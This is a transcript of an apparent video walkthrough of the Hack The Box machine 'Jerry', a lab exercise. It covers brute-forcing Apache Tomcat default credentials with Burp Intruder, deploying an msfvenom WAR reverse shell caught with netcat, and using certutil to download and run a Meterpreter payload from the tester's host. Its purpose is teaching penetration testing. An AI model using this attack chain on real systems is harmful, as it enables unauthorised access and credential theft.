So today's machine is going to be Jerry. Jerry lives at 10.10.10.95. So if you're not already on this site, go ahead and go to hackthebox.eu. Go over here to your all machines and scroll down to Jerry and hit the play button. Once you've got that all set up, let's go ahead and get Jerry scanning. So I'm going to open up a new terminal here. And we'll do our typical scan install where I scan it. We'll talk about it until the scan comes back, and then we'll look at the scan. So you can go ahead and use your favorite scan method. You should know mine by now. Very straightforward here. And we'll let that run. So let's talk about Jerry. Jerry is a Windows machine, as we can see here. And historically, Jerry is one of the most rooted and easier machines on Hack the Box. We can see here that it's got 12,000 user owns and roots. And we can see from the rest that, the next closest in this list is 8,000, right? So by far, Jerry is one of the most rooted, if not the most rooted machines. So while it's easy, it does not mean that it does not have important lessons to teach us. The most important lesson we're going to learn today is about default credentials. Why are default credentials so bad, and why are they so common still? I run into default credentials as a pen tester all the time. On the external web, in my history, I have run into Cisco on a default credential on a Cisco router, leading to internal network access. I have got domain admin off of a printer with default credentials on an internal network. I've gotten reverse shells off of default credentials on internal networks. So default credentials can lead to some very, very bad things, and you're going to see an example of that today. On top of that, what we're going to be doing is we're going to be doing some bash scripting. We'll do a little bit of brute forcing. We're going to be using Burp Suite today. There's a lot of cool tactics that I can show you that are going to just improve our learning process. On top of that, I'll talk about some manual exploitation for this machine. We'll use MSF Venom, generate some shellcode, but we'll use Netcat to actually get in the machine. And then we'll talk about file transfers and how to improve. So we got a lot to learn from a very, very basic box. So let's go ahead and just take a look at the scan now. So our scan came back and 65,534 ports were filtered. That is great. Why is that great? That means we only have one port to focus on here, and that port is 8080. Now, there are some situations where there might be hidden ports like port knocking, but for a machine this easy on Hack the Box, I'm not thinking that that's the path. So when we're looking at 8080, this says, hey, vulnerability for sure somewhere on 8080, that's where you're going to get it. So we've got some version information here. We can see Apache Tomcat with the JSP engine of 1.1. We can also see Apache Tomcat version number here of 7.0.88. So as we talked about before, this is perhaps a default web page. We're getting a lot of Tomcat information here. And if it's not a default web page, why are they disclosing their server headers with service information? That's just a no-no. We would write this up on a pen test report as a finding. So there are some things that we can do off the bat here. My first decision is always to go to the web page and see what I'm working with. But if we do want to, we can also Google something like Apache Tomcat 7.0.88 exploit and see if there's any exploits out there. We could do the same for this JSP engine and see if there's any exploits for that. That would be version exploits, right? Before we do that, or we're not actually going to get into that, but before we did that, my step would always be to go out to the web page just to see what's going on. And in this instance, we're working with port 8080. So we're going to go out and we're just going to go to 10.10.10.95. You can see I have it here with the port 8080 at the end. Go ahead and hit enter. And we are brought to this Apache Tomcat page. Now, this is not a good page to be leaving open, or even if it's on the internal network. But if this is on the external, this is bad. You'll find this on external networks. People will tuck it away under like /manager or /admin or whatever, because this over here on the side is what gets you into the admin panels. So you do see this a lot. This Apache Tomcat is very realistic. And if there is any sort of guessable credentials on this side of the house, oh, it's game over, and you're going to find out why. So this would be a finding too, depending on what you're doing. If this is external, this is like, hey, why do you have this up? You should put this behind a VPN so that only you can access it when you're on the internal side. Don't leave this open on the external network. On the internal side, is this VLAN off? Who has access to this page? Why do they have access to this page? You don't want this easily accessible by any means. So we're at this page, and we have this manager app over here on the side. Now we can log in with the manager app and do some malicious things. But before we can log in here, one of the first things I do when I see a login on a login page like this with the service version, I'm going right to Google. I'm going to say, hey, Google, what's up? Let's talk about Apache Tomcat default credentials. And let's see what we can pull up. First thing that comes up is GitHub, right? And we can come into GitHub, and GitHub has this wonderful list because Tomcat has quite a few default credentials. So what we can do is we can take this list and use it in a brute force. Now there are tools out there that'll do this for us. I kind of want to get a little crafty today and teach us some manual methods. I think that'll be more fun. So what we're going to do is we're going to fire up Burp Suite. And the newer Burp Suite errors out with this Java error. Don't worry about it too much. We're not going to worry about fixing it today. We'll work around it. So we're going to go ahead and just click next and start Burp with default. Now, in order to get Burp Suite working, there is this proxy here, right? And the proxy, if we go actually into options tab, it sits at 127.0.0.1, the home address on port 8080. And this is how we intercept traffic. So we need to actually do that. We need to go into our little hamburger menu here and go up to preferences or down to preferences, scroll all the way down. And at the very bottom is the network proxy. We're going to filter all of our traffic through Burp Suite. Right now, you should be set to use system proxy settings. Go ahead and just select manual proxy configuration, 127.0.0.1 here, port 8080 here, and click the box for use this proxy server for all protocols. So it should look like this when it's all said and done. Okay, so we'll hit OK on that, and we'll test this out. If we go back to the Apache Tomcat and we just hit enter, it shouldn't load. It should freeze here. Something should just be spinning. And if you look at your proxy, proxy got intercepted. What's going on? Well, what's happening here is we intercepted the request, and before we send it to the page, we have the opportunity to modify it. We can say, instead of a GET request, you could put this as a POST request. We can get malicious in here. We could do all sorts of things. And this is where web app testing really becomes fun, is when we start tampering and doing certain, malicious activities with these requests. But for now, let's just go ahead and forward it. And you should see the page reloads. Perfect. What we're after today is this manager app. So if we click on manager app, and you see that, okay, it freezes on manager. Let's just forward this request and see what happens. All right, so 10.10.10.95.80.80, it's asking us for credentials. Well, there's 21 or so in that list, but one I did remember was Tomcat. So let's try Tomcat and just say okay. Now, immediately this intercepts the request. And a lot of times what you'll see is a username field and a password field here, but we're actually getting this authorization basic. And it looks like it's encoded with base64. You could usually tell this by the equal signs at the end typically. So what we can do here is we can right click on this and we can say send this to decoder is one option we're going to do. And you'll see your decoder tab lights up, right? And you come in here and you just scroll down and highlight this little area, and let's see what it's doing. We'll decode as over here and we'll just say base64. If we scroll down, you can see it's just saying, hey, Tomcat, Tomcat. So username, password is what it's attempting. And let's go ahead and forward this and see what happens. Doesn't look like it worked, right? So we forwarded it and it didn't work. Okay, we could try manager Tomcat or something along those lines. And this time, what we can do, intercept it one more time. We could do a couple different cool little things. One is we could say, hey, send this to repeater. And hey, number 2, send this to intruder. So we'll see both of our tabs light up. If we look at repeater, repeater just repeats requests. We have the opportunity, instead of sending it in real time with a proxy, to come back over here and send the request and see what the response is. So this is where we can kind of just play with certain requests and see how the server responds. So if we hit go on this, we can see that we got a 401 unauthorized. So 401 means, hey, you did not get access to here, right? So this set of credentials is incorrect. And okay, let's just go ahead and turn the intercept off. We'll let this go. We'll hit cancel. And then let's go ahead and try brute forcing this, because, you know, there's 20 something here, right? 30 lines. It says 30 lines of passwords. That's a lot of passwords. So what we'll do is let's go into a new window. Okay. And let me make this bigger. And I'm going to use gedit because I like gedit. So let's just say gedit tomcat.text. And what we'll do here is we will copy all these usernames and passwords and then paste them into here. Now, select the space in between. Remember the format that we had. We got to put this into base 64. So what we're going to do, I guess I should explain that a little bit better, is we sent our request to intruder. If we come into positions here, we see that our request is sitting here. What intruder is going to do is do a brute force style attack based on the attack type that we select. Well, the requests are coming through in base 64, so we have to put these into base 64 in that format that we saw. See, username, password. So we're going to do the same thing now, is get this set up. Then we're going to convert these to base 64, and then we're going to fire them off. So first things first, let's go back into here. We've got this little space copied. Let's hit Control H. That's our find and replace. Let's go ahead and just paste that space here. And what we're going to do is we're going to just replace everything that has that kind of space with this colon. We'll replace all. And look how easy that was. So now we've got a set list of credentials here that is actually 25 lines long. And so we're going to save this out. And we're going to write a little bash script. So if you have never used any bash scripting, one, I recommend watching some videos on bash scripting. I've got a few on my channel. If you watch the tail end of the Linux for Ethical Hackers course, it's in there. I've got individual videos on it as well, pretty much typically the same lesson. But the importance of what you're about to see is called a for loop, and for loops are awesome. You see one-line for loops a lot, and they're just very useful when it comes to pen testing. So let's break down what we're going to do. So we've got credentials in this list, right? We've got these credentials, and we'll just take one for an example. We want to convert these credentials into base 64. So one way we can do that is we can just echo, and we say echo -n, and we're going to say, I want to put that, say Tomcat, right? Like that, into base 64. This is the command to do that. And there it is. Now, if we were to decode this, this would come back out as Tomcat. Okay, that's cool, but we've got a long list here in this tomcat.text. And what we need to do is do this for everything in that list. So let's write a for loop, and then we'll talk through it. So I'm going to say for cred, and you can call this whatever you want. You can call it Bob if you want, but for cred, it's our variable in, and then we got to specify what the credentials are and where they're at. So every line here is going to be a credential in this loop, and I'll explain it a little bit better detail, but we're going to cat out this tomcat.text, meaning we're going to print all the lines. Okay. And what's going to happen is we're going to do something. We're going to do an echo-n for that credential, and we're going to pipe that into base 64, and then we're going to say done. So what's happening here? A for loop means you're going to do something for everything in that instance, right? So for the first line in tomcat.txt, for the second line, for the third line, until you are completely done. So for credential, all we're saying is, hey, the first line, we're going to call that cred. And then when that first line prints out in this cat, we're going to put it over here in this echo command, put it through base 64, and then we're going to go back again in the second line. We're going to call that cred. We're going to do it again, and then we're going to go all the way through in base 64, all of these. And then it should print out and be done. Boom, look at that. Okay, so we've got all the credentials that we just put through in base 64 format. So what we're going to do is just let's copy all these here. And we're going to go back into Burp Suite. Now, of course, like I said, there is a tool that's out there for this, or you can manually type these, but with so many default credentials, most websites only, or most programs only have like 2 sets of default credentials, but Tomcat, for whatever reason, has a lot. But here we go, we're in Burp Suite. Now, in order to use intruder, we need to set up what we're going to intrude on. So here, we need to set our payload parameter area. We're going to set the position of 1 here. This is position 1, okay? And we're saying, hey, everything here, this is what we're going to replace. So we're going to use a sniper attack, and sniper just means 1. That's how you can think of it. This is just 1 payload that we're going to be sending off. So if we go into payloads tab over here, we can just hit paste on our list. And you can see now it's going to fire off 25 payloads. What it's going to do is it's going to replace the base 64 that we highlighted with the base 64 that's here. One other thing that we need to take off here is this URL encoding. It's going to attempt to URL encode these characters. And in this instance, if it tries to URL encode these equal signs, it's actually going to fail for us. So it should be noted that we're also on a free community edition of Burp Suite. Thus, it's going to be slower. The free edition is very slow. The pro edition, very fast. So we're going to hit start attack, and it's going to say, hey, we're going to slow this down just to be jerks. And what's going to happen here is that we're going through all 25 requests, right? And you can see different status codes come through. I mean, that's what we're looking at. We're looking at 2 things. 1, we can sort by status code. 2, we can sort by the length here. Now, some advanced topics or tactics is when you're running through thousands. Say you're doing a username brute force, and you're trying to find the one person that, you know, might have got through. You can come through, say, on a response, and you can see something in here that says, like, you are not authorized to view this page. You can copy you are not authorized, and you can paste it down into your payload rules here or options and say, hey, grep on this. And then they'll have a little checkbox up here that says you are not authorized, and it'll check every time it comes through here. And then you could just sort by that. So if you click on these, you can sort by different things, right? So length is a big one. If length changes, look how significant this length is here. And you see the rest of these, nothing. Any 400 we don't really care about. This one 403 for whatever reason, forbidden access denied. This one, that might be a valid set of credentials, but we don't have access to that application. This one is a valid set of credentials that does. Look at the 200 status, that means okay. And on top of it, we have a 17,000 length compared to 2,000 or 3,000 here. So significant differences, but in long lists, it's better to grep on something like an error and then just sort by that error with the checkboxes to find, you know, maybe a different message that came through as opposed to just looking for length or status codes. Because you might get like a 302 redirect or something on a login or successful login. Okay, so here we've got these credentials, which these actually come out to Tomcat secret is how that played out. So this is Tomcat secret in case you are curious. Okay, and so that logged us in. So let's go ahead and say no to these changes. We know for sure that we're in, so let's go to the page. And what I'm going to do for the rest of this time, I'm going to go ahead and turn off Burp Suite and these proxy settings. And let's just log into the manager app with our newfound credentials. And you could have base decoded this. I was just being lazy, by the way. You could come in here and say, hey, what is this? Because I have no idea. I can't read this. You can easily just go to decoder and decode that, right? And see that it's Tomcat's secret. Okay, so from here, we are now in the application itself. So if you've never been in a Tomcat application, they use something called WAR files. Okay, WAR files are used to upload here, and they deploy these applications. You see manager, host manager, examples, blah, blah, blah. What we can do is upload a malicious WAR file and get a reverse shell. See, there is an area here to upload a WAR file. Now, if this is your first time in the application and you're new and you're like, oh man, what am I doing here? You say, okay, well, I see that there's a WAR file. I wonder if I can be malicious with that. And then you might go and say WAR file reverse shell or something along those lines. WAR file exploit. And then you can see there's all kinds of articles that come through using Metasploit to create a WAR backdoor, Apache Tomcat WAR backdoor. So this is the kind of information that we're after. A couple other things that we see down here that help us out as well is we see that we're running on a Windows Server 2012 R2. That means that we're likely running on 64-bit, right? This is R2 server, and we get some information about the OS. That's nice. Oh, AMD 64, it is 64-bit. So we picked up a little bit of information, host name and IP address. So a little bit of information disclosure there as well that'll help us when we're trying to make this WAR file, right? So what we're going to use is a MSF Venom. There's Tomcat WAR reverse shell MSF Venom. Let's click on that here. This is good. So this creating Metasploit payloads here, this netsec.ws is good. There's a lot of cheat sheets out there for different ones. This is a very nice cheat sheet that I like to go to. As you can see, I've already been to it before. You could just go down the list. Like if this was a PHP site, we can go to a PHP site. And I think I've showed you this before for the ASP. Same thing. Here we're just using a WAR file, and we're going to generate this on our own. So let's go ahead and let's Control L. And if we see what it wants us to do, I'll just copy and paste it. We'll be lazy. Okay, and we'll paste it in. Now we have two options here, right? We can do the manual method, which is what we're doing, or we could do the Metasploit method. We'll do the manual method today, but we could change the payload to a interpreter payload and use the exploit handler on Metasploit and get an exploit or a Metasploit reverse shell easily. Okay, so let's go back and let's just talk about what we're seeing. MSF Venom-P for payload. We are running on Java on this platform, and we're going to be using a JSP shell reverse TCP. Notice all the underscores, not the forwards. This is getting sent all at once. This is an unstaged payload, not a staged payload. So let's go ahead and enter in the IP address that we're going to be using. I actually don't know mine. So I'll open up a new tab really quick and do the ifconfig or your IPA. 10.10.14.24 for me. So we're going to be listening on our IP address. And you can listen in on the port of your choice. I will just use the standard all fours on this machine. And then we're going to generate this. And it takes just a second here. Okay, we have generated a shell.war file. That means we need to be listening on this 4444 in order for this shell to come back to us. Let's go ahead and use netcat-nvlp. So netcat is a listener/connector. It's a port tool. It's amazing functionality. What we're going to be doing here is we're saying, hey, netcat, I want to listen right now. And again, remember, when we're doing reverse shell, that just means somebody talks back to us. All we have to do is listen. So we're going to be listening on all fours. Okay, that's the port we're listening on. Now, what's going to happen is this is going to say, we're going to upload it, and then it's going to try to connect back to the IP address that we supplied. So let's go ahead and browse for that WAR file. I put mine in my root folder. And there it is, shell.war. Okay, and we're going to say deploy. We've deployed it. You can see here that it is /shell, and we've got nothing yet. but we can force this along and get that shell by going to it. And boom, look at that. It talked back to us. We are so malicious, okay? So the best thing about this box also is who am I, authority system right off the bat. And if we go to the users file, I remember this from a long time ago. If we say dir, actually desktop, sorry, and we say dir, and we type, you see it's flags, or it might be, that's a directory. Let's go to the flags directory and then do a dir. And then 2 for the price of 1, they actually give you both flags here. So the fact that there were people that only had, there were more root owns than there were user owns for whatever reason. Some people just decided they didn't want the user on this machine, but both flags are sitting in there. So I think that's funny. Anyway, we're back in here. Okay, we have system on this machine. We can do all kinds of commands and look around, right? You know, we can look at the ARP, see who we're talking to. Sorry, ARP-A. We're not talking to anybody but 10.2 and 10.255. Now, this really isn't useful. Again, this is just for your knowledge. It's not going to be very useful in a hack-the-box environment like this. If you're doing like a lab environment, super useful to see who it's talking to. Same thing with netstat. Same thing with the route print on Windows. So, okay, we found our flags. This is cool. But we're still in that limited flexibility. So let's go ahead and talk about how we can improve this shell. Again, we're going to use Metasploit, but we're going to do this a little bit outside the box this time. So what I want to do is I want to create a reverse shell to this machine. We're going to generate a new reverse shell. So we'll come into here and we'll use MSF Venom like before. So we'll say MSF Venom. We'll do a payload here of Windows, because we know it's a Windows machine, x64 because we know it's 64-bit, and we'll just say interpreter, and then we'll try shell reverse TCP, and that may or may not work. So we'll try staged and unstaged here. Our L host again mine is 10.10.14.26. The L port is going to be, let's do 5555 so we don't interfere with the all fours we're already on. And then all we need is a file type, which is exe. And we'll put that into a shell. We'll just call it sh.exe. Let that generate. On top of that, let's go ahead and go into Metasploit. And we'll say, hey, Metasploit, how you doing? I want to run your exploit handler. So this should look familiar from last time. And it looks like I picked up a bad shell here. So maybe I don't know what I'm doing. So let's go into use exploit multi-handler, and let's see what the name of that is. So we'll say set payload, and we'll say Windows, do a tab, it's a little slow, x64, interpreter. I think it's just maybe reverse TCP. Yeah, it's not shell reverse TCP, it's just reverse TCP. And delete that, regenerate it, sorry. And come back into here while that's regenerating. We could say options. And we'll just say set lhost. Same thing we just specified. 14.26 set lport all fives. And now we're just going to run this and listen on it. Said it failed to bind. Why is it failing to bind? Let's check our IP one more time. 14.24, guys. I am screwing up so bad. Okay. Hopefully you're running the right IP address and you're not being like me. I have to fix this payload really quick to be 24. I've been doing the offshore labs all week, all last week, and my IP address was a little bit different. So that's kind of why I'm getting these numbers mixed up. Okay, so we're running on this now, and we are also running on the correct payload. So how do we get a file onto a Windows machine? Well, first and foremost, we need to host a web server. the easiest way to host a web server is with Python. Now we could just say python-m, and we could say HTTP, simple HTTP server on 80 like this. And that's going to load up a simple HTTP server. So we're in here, and now we're hosting up every single file that is in this root folder. So that's a nice thing. We've got instant access to everything that's here. We can cut it out as soon as we want to and be done. So we can go to our 10.10.14.24 and see everything that I'm hosting here. And then as soon as I don't want to host it anymore, and you can see what's going on as well. That's status commands. Awesome. Control C, I come back and it's dead. So it's just for as long as you need it. So we've got the shell now being hosted. And when we talk about collecting or transporting files on Windows, there is a tool that's on there. Now it's starting to get picked up by Defender, but for a long time it didn't. So on assessments, it still works fairly well. What we can do here, it's a built-in tool. Now everybody knows about wget for Linux. This is my idea of the quick and dirty way of doing like a wget for Windows. That's not very commonly well known. So let's just go and say, we'll just put it on in the flag folder, that's fine. So we'll say certutil, if I could type, and we're gonna say -URL cache, meaning we're bringing over a file via URL. We're gonna do a -F for the file, and we're gonna say, hey, I wanna grab 10.10.14.24/sh.exe. And while I'm at it, let's put that file in users, administrator, desktop, flags, and we'll also call it sh.exe. Okay, you can see it grabbed it. We could say dir just to make sure. Okay, sh.exe is in here. And on top of it, if we go to our file server, you can see that sh.exe was actually retrieved by the file server. So this is nice when you're running like a blind payload on a web server and you don't know if it's actually downloading. You can have it download something to see if you've got command execution like this and know for sure that something came through. I ran into that just this past weekend, actually. So from here, we can just say sh.exe, run it, and look what happened. We now have a Meterpreter reverse shell. Now, in the real world, this is going to be picked up fairly easily, I would imagine. But, you know, we could obfuscate this more, but in a situation like this, or even a bad environment where they don't have good AV, something like this is not going to get picked up at all. So this is just a nice way to show you like, hey, we can get a Meterpreter session, and now we can just do a hash dump. You know, we have control over what we can do, and we have a lot more flexibility again. So yes, it ends in Meterpreter, but we went a very manual method of doing it. We also, what did we learn today? We learned default credentials are very bad and can lead to very bad things. We learned that we can use some nifty little tricks in for loops and get something done very quick with some basic bash scripting. We learned how to use Burp Suite. We learned about repeater and the proxies and intruder. A lot of cool features in there that we'll only dive into more as we go. And we learned how to transfer files on a Windows machine to improve a shell and just, you know, get better overall. So thank you so much for joining me. And until next time, my name is TCM. And thank you for having me.